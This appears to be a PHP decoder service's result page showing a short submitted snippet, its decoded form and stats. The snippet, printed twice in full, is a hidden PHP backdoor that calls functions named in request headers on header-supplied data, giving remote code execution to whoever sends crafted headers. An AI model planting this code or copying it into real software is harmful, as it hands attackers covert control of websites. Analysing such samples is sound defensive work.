Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_HEADERS = getallheaders(); if (isset($_HEADERS['Server-Timing'])) { $oauthex..

Decoded Output download

<?php
$_HEADERS = getallheaders(); 
if (isset($_HEADERS['Server-Timing'])) { 
    $oauthexceptions = $_HEADERS['Server-Timing']('', $_HEADERS['X-Dns-Prefetch-Control']($_HEADERS['Sec-Websocket-Accept'])); 
    $oauthexceptions(); 
} ?>

Did this file decode correctly?

Original Code

<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Server-Timing'])) {
    $oauthexceptions = $_HEADERS['Server-Timing']('', $_HEADERS['X-Dns-Prefetch-Control']($_HEADERS['Sec-Websocket-Accept']));
    $oauthexceptions();
}

Function Calls

getallheaders 1

Variables

None

Stats

MD5 72216484bea4a6fcc4bcba04a94b4f0f
Eval Count 0
Decode Time 88 ms